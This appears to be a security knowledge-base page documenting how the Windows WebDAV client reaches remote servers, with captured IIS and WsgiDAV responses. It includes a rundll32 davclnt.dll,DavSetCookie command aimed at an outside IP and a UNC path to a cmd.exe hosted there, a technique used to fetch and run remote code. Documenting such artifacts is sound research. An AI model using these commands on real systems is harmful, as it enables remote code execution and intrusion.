WebDAV Technical Details
rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 3.145.123.144@80 http://3.145.123.144/ok.txt
Microsoft-WebDAV-MiniRedir/10.0.22631IIS data:
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
DAV: 1,2,3
MS-Author-Via: DAV
X-Content-Type-Options: nosniff
Date: Sun, 15 Sep 2024 03:25:57 GMT
Content-Length: 0
<?xml version="1.0" encoding="utf-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response>
<D:href>http://live.sysinternals.com/tools/</D:href>
<D:propstat>
<D:status>HTTP/1.1 200 OK</D:status>
<D:prop>
<D:getcontenttype/>
<D:getlastmodified>Thu, 22 Aug 2024 08:23:33 GMT</D:getlastmodified>
<D:lockdiscovery/>
<D:ishidden>0</D:ishidden>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
<D:getetag/>
<D:displayname>tools</D:displayname>
<D:getcontentlanguage/>
<D:getcontentlength>0</D:getcontentlength>
<D:iscollection>1</D:iscollection>
<D:creationdate>2024-08-22T08:19:54.122Z</D:creationdate>
<D:resourcetype><D:collection/></D:resourcetype>
</D:prop>
</D:propstat>
</D:response>
</D:multistatus><?xml version="1.0" encoding="utf-8"?>
<D:multistatus
xmlns:D="DAV:">
<D:response>
<D:href>http://live.sysinternals.com/tools/logonsessions64.exe</D:href>
<D:propstat>
<D:status>HTTP/1.1 200 OK</D:status>
<D:prop>
<D:getcontenttype>application/octet-stream</D:getcontenttype>
<D:getlastmodified>Wed, 25 Nov 2020 09:59:42 GMT</D:getlastmodified>
<D:lockdiscovery/>
<D:ishidden>0</D:ishidden>
<D:supportedlock>
<D:lockentry>
<D:lockscope>
<D:exclusive/>
</D:lockscope>
<D:locktype>
<D:write/>
</D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope>
<D:shared/>
</D:lockscope>
<D:locktype>
<D:write/>
</D:locktype>
</D:lockentry>
</D:supportedlock>
<D:getetag>"03bdeb111c3d61:0"</D:getetag>
<D:displayname>logonsessions64.exe</D:displayname>
<D:getcontentlanguage/>
<D:getcontentlength>563088</D:getcontentlength>
<D:iscollection>0</D:iscollection>
<D:creationdate>2024-08-22T08:23:20.550Z</D:creationdate>
<D:resourcetype/>
</D:prop>
</D:propstat>
</D:response>
</D:multistatus>WsgiDAV data:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 0
DAV: 1,2
Date: Sun, 15 Sep 2024 03:15:04 GMT
Accept-Ranges: bytes
Allow: OPTIONS, HEAD, GET, PROPFIND, PUT, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
MS-Author-Via: DAV
Server: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2<?xml version="1.0" encoding="UTF-8"?>
<D:multistatus xmlns:D="DAV:">
<D:response>
<D:href>/ok.txt</D:href>
<D:propstat>
<D:prop>
<D:resourcetype></D:resourcetype>
<D:creationdate>2024-09-14T01:24:13Z</D:creationdate>
<D:getcontentlength>2</D:getcontentlength>
<D:getcontenttype>text/plain</D:getcontenttype>
<D:getlastmodified>Sat, 14 Sep 2024 01:24:19 GMT</D:getlastmodified>
<D:displayname>ok.txt</D:displayname>
<D:getetag>1b44073a966b03898af30d3ecc82cfca-1726277059-2</D:getetag>
<D:lockdiscovery/>
<D:supportedlock>
<D:lockentry>
<D:lockscope><D:exclusive/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
<D:lockentry>
<D:lockscope><D:shared/></D:lockscope>
<D:locktype><D:write/></D:locktype>
</D:lockentry>
</D:supportedlock>
</D:prop>
<D:status>HTTP/1.1 200 OK</D:status>
</D:propstat>
</D:response>
</D:multistatus>
C:\Windows\system32\svchost.exe -k LocalService -p -s WebClient
\localhost\C$\Users\dev0\Documents
UNC\3.145.123.144@80\trex\cmd.exe
Last updated
Was this helpful?